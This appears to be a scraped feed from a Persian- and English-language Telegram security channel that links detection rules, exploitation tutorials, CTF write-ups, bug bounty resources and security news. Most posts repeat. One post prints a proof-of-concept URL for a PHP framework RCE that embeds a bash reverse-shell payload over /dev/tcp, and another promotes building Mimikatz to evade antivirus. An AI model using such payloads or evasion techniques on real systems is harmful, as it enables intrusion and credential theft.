UAC bypass (Privilege escalation)
Real Time Detection of User Account Control (UAC) bypass via hijacking The DiskCleanup Scheduled Task
https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
#UAC_Bypass
@securation
Real Time Detection of User Account Control (UAC) bypass via hijacking The DiskCleanup Scheduled Task
https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
#UAC_Bypass
@securation
Building a custom Mimikatz binary
This post will cover how to build a custom Mimikatz binary by doing source code modification to get past AV/EDR software.
https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
#tools #windows #mimikatz #redteaming #evasion
@securation
This post will cover how to build a custom Mimikatz binary by doing source code modification to get past AV/EDR software.
https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
#tools #windows #mimikatz #redteaming #evasion
@securation
s3cur3th1ssh1t.github.io
Building a custom Mimikatz binary | S3cur3Th1sSh1t
This post will cover how to build a custom Mimikatz binary by doing source code modification to get past AV/EDR software.
Dynamic Binary Instrumentation Techniques to Address Native Code Obfuscation
Paper:
https://raw.githubusercontent.com/quarkslab/conf-presentations/master/BlackHat-Asia-20/asia-20-Thomas-Dynamic-Binary-Instrumentation-Techniques-to-Address-Native-Code-Obfuscation-wp.pdf
Slides:
https://raw.githubusercontent.com/quarkslab/conf-presentations/master/BlackHat-Asia-20/asia-20-Thomas-Dynamic-Binary-Instrumentation-Techniques-to-Address-Native-Code-Obfuscation.pdf
#android #Obfuscation #binary
@securation
Paper:
https://raw.githubusercontent.com/quarkslab/conf-presentations/master/BlackHat-Asia-20/asia-20-Thomas-Dynamic-Binary-Instrumentation-Techniques-to-Address-Native-Code-Obfuscation-wp.pdf
Slides:
https://raw.githubusercontent.com/quarkslab/conf-presentations/master/BlackHat-Asia-20/asia-20-Thomas-Dynamic-Binary-Instrumentation-Techniques-to-Address-Native-Code-Obfuscation.pdf
#android #Obfuscation #binary
@securation
Forwarded from APA Ilam
intel vulnerability
1.9 MB
Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. @securation
CVE-2020-15227 PHP framework nette callback RCE
POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
@securation
POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
@securation
اگه این چند وقت درگیر دوتا آسیب پذیری زیر هستید :
CVE 2020 16898
CVE 2020 1472
این رول snort براش نوشته شده میتونید استفاده کنید :
https://github.com/bhdresh/SnortRules/blob/master/Exploit/CVE-2020-1472.rules
@securation
CVE 2020 16898
CVE 2020 1472
این رول snort براش نوشته شده میتونید استفاده کنید :
https://github.com/bhdresh/SnortRules/blob/master/Exploit/CVE-2020-1472.rules
@securation
GitHub
SnortRules/Exploit/CVE-2020-1472.rules at master · bhdresh/SnortRules
This is an open source Snort rules repository. Contribute to bhdresh/SnortRules development by creating an account on GitHub.
Threat research:
DOS2RCE - A New Technique to Exploit V8 NULL Pointer Dereference Bug (+ PoC on Chrome ver.77)
https://blog.br0vvnn.io/pages/blogpost.aspx?id=1&ln=0
@securation
DOS2RCE - A New Technique to Exploit V8 NULL Pointer Dereference Bug (+ PoC on Chrome ver.77)
https://blog.br0vvnn.io/pages/blogpost.aspx?id=1&ln=0
@securation
رمزگشای باج افزار #MaMoCrypt توسط بیتدیفندر منتشر شد. این باج افزار به زبان دلفی نوشته شده و با پکر mpress پک شده.
از اینجا میتونید تولز دیکریپتش رو دانلود کنید:
https://labs.bitdefender.com/2020/10/mamocrypt-ransomware-decryption-tool/
@securation
از اینجا میتونید تولز دیکریپتش رو دانلود کنید:
https://labs.bitdefender.com/2020/10/mamocrypt-ransomware-decryption-tool/
@securation
Bitdefender Labs
Daily source of cyber-threat information. Established 2001.
مهندسی معکوس و آسیبپذیریهای سطح اپلیکیشن و کرنل همیشه جذابیت خودشون رو داشتن، یکی از آسیبپذیریهای جالب Double Fetch میباشد. به صورت خیلی خلاصه آسیبپذیری Double Fetch زمانی رخ میدهد که یک رقابت (از لحاظ زمانی) برای دستیابی به یک دیتا بین دو سطح User-Mode و Kernel-Mode رخ میدهد. یکی از زمانهایی که امکان مشاهده این آسیبپذیری وجود دارد در Threadها است. در این لینک میتونید با مثال دقیقتر و کاربردی در خصوص این آسیبپذیری مطالعه کنید.
#reverse #Double_Fetch
@securation
#reverse #Double_Fetch
@securation
👍1
این ورکشاپ هک کردن اپلیکیشن اندروید در مسابقات CTF با هدف کشف آسیب پذیری و اکسپلویت کردن آن که چند نمونه از باگ بانتی های هکروان رو هم در خودش جا داده و خیلی فنی کار رو به آخر رسونده رو ببینید.
ویدیو ها:
https://youtu.be/PMKnPaGWxtg
اسلایدهای مرتبط ورکشاپ:
https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRIF4yDF4qmMY2qEelS1M7rI/edit#slide=id
#android #ctf #bug_bounty
@securation
ویدیو ها:
https://youtu.be/PMKnPaGWxtg
اسلایدهای مرتبط ورکشاپ:
https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRIF4yDF4qmMY2qEelS1M7rI/edit#slide=id
#android #ctf #bug_bounty
@securation
YouTube
Mobile Hacking Workshop - Community Day
This is the mobile hacking workshop I created for HackerOne's Community Day. Each ctf exercise is for learning purposes only and I don't condone any unethical buffoonery.
Workshop Slides:
https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRI…
Workshop Slides:
https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRI…
ابزار بروت فورس سریع نهان نگاری, نوشته شده با زبان Rust , ابزار مفیدیه واسه مسابقات CTF
https://github.com/R4yGM/stegbrute
#stegano #ctf
@securation
https://github.com/R4yGM/stegbrute
#stegano #ctf
@securation
تحلیل آسیب پذیری خطرناک zerologon با شناسه ثبت شده ی CVE-2020-1472 رو در دپارتمان امنیت سکان اکادمی بخونید.
https://sokanacademy.com/blog/10491/zerologon-cve-2020-1472
#zerologon #cve_1472
@securation
https://sokanacademy.com/blog/10491/zerologon-cve-2020-1472
#zerologon #cve_1472
@securation
Sokanacademy
تحلیل آسیب پذیری ZEROLOGON
در این مقاله به بررسی فنی آسیب پذیری به شناسه CVE-2020-1472 که با عنوان Zerologon شناخته می شود خواهیم پرداخت.
خبری که منتشر شده ادعایی هست مبتنی بر هایجک کردن اکانت تلگرام در موبایل با استفاده از پروتکل SS7 !
که البته این مورد در ایران جواب نمیده نگران نباشید.
https://www.bleepingcomputer.com/news/security/hackers-hijack-telegram-email-accounts-in-ss7-mobile-attack/amp/?__twitter_impression=true&s=09
#attack
#SS7
#hijack
@securation
که البته این مورد در ایران جواب نمیده نگران نباشید.
https://www.bleepingcomputer.com/news/security/hackers-hijack-telegram-email-accounts-in-ss7-mobile-attack/amp/?__twitter_impression=true&s=09
#attack
#SS7
#hijack
@securation
چک لیست مفیدی برای کشف آسیب پذیری و باگ بانتی
https://github.com/EdOverflow/bugbounty-cheatsheet
به همراه لیستی از پلتفرم های تمرین آسیب پذیری ها
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/practice-platforms.md
#bug_bounty
#tools
#lab
#pentest
@securation
https://github.com/EdOverflow/bugbounty-cheatsheet
به همراه لیستی از پلتفرم های تمرین آسیب پذیری ها
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/practice-platforms.md
#bug_bounty
#tools
#lab
#pentest
@securation
GitHub
GitHub - EdOverflow/bugbounty-cheatsheet: A list of interesting payloads, tips and tricks for bug bounty hunters.
A list of interesting payloads, tips and tricks for bug bounty hunters. - EdOverflow/bugbounty-cheatsheet
چند رایت آپ از چلنج های مسابقات Flare-on7 از علی امینی :
https://github.com/aleeamini/Flareon7-2020
#flareon #reverse #re #writeups
@securation
https://github.com/aleeamini/Flareon7-2020
#flareon #reverse #re #writeups
@securation
ARM64 Reversing and Exploitation
Part 1: http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/
Part 2: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
Part 3: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
#reverse #binary #exploitation #arm64
@securation
Part 1: http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/
Part 2: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
Part 3: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
#reverse #binary #exploitation #arm64
@securation
Prateekg147
ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow
Hi Everyone ! In this blog series, we will be understanding the ARM instruction set and using that to reverse ARM Binaries followed by writing exploits for them. So let’s start with the basics of ARM64.
اگه باگ هانتر هستید و از تجارب دیگران استفاده میکنید حتما این 25 ریپورت برتر در باگ بانتی از آسیب پذیری XXE بخونید :
https://corneacristian.medium.com/top-25-xxe-bug-bounty-reports-ab4ca662afad
#XXE #Bug_bounty
@securation
https://corneacristian.medium.com/top-25-xxe-bug-bounty-reports-ab4ca662afad
#XXE #Bug_bounty
@securation
Medium
Top 25 XXE Bug Bounty Reports
In this article, we will discuss XXE vulnerability, how to find one, and present 25 disclosed reports based on this issue.
کمپانی ها در سال 2020 نزدیک به 4.2 میلیون دلار بابت گزارش های آسیب پذیری XSS بانتی پرداخت کردن .
🧲در ایران فقط دو آسیب پذیری وجود داره:
1- هک شدیم یا نه(مسئول مربوطه کل دیتابیس و روت سرور رو ازت میخواد)؟
2- پول از حساب کاربرا کم میشه یا کاربرا رایگان حسابشون رو شارژ میکنند که پیگیر امنیت سامانه هامون بشیم ؟
https://securityaffairs.co/wordpress/110223/reports/xss-top-bug-bounty.html
#bug_bounty #xss_reports
@securation
🧲در ایران فقط دو آسیب پذیری وجود داره:
1- هک شدیم یا نه(مسئول مربوطه کل دیتابیس و روت سرور رو ازت میخواد)؟
2- پول از حساب کاربرا کم میشه یا کاربرا رایگان حسابشون رو شارژ میکنند که پیگیر امنیت سامانه هامون بشیم ؟
https://securityaffairs.co/wordpress/110223/reports/xss-top-bug-bounty.html
#bug_bounty #xss_reports
@securation
Security Affairs
Companies paid $4.2M bug bounties for XSS flaws in 2020
XSS issues are the most common vulnerabilities that received the highest amount of rewards on the HackerOne vulnerability reporting platform.
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
این فیلم رو هکرهای دولتی ارمنستان منتشر کردن و گفتن ما به سامانه دولتی آذربایجان دسترسی پیدا کردیم و اطلاعات اون رو دامپ کردیم ، آدرس سامانه هک شده کشور آذربایجان اینه :
https://webmail.mail.gov.az
#cyberwar #data_breach #attack #webmail #az
@securation
https://webmail.mail.gov.az
#cyberwar #data_breach #attack #webmail #az
@securation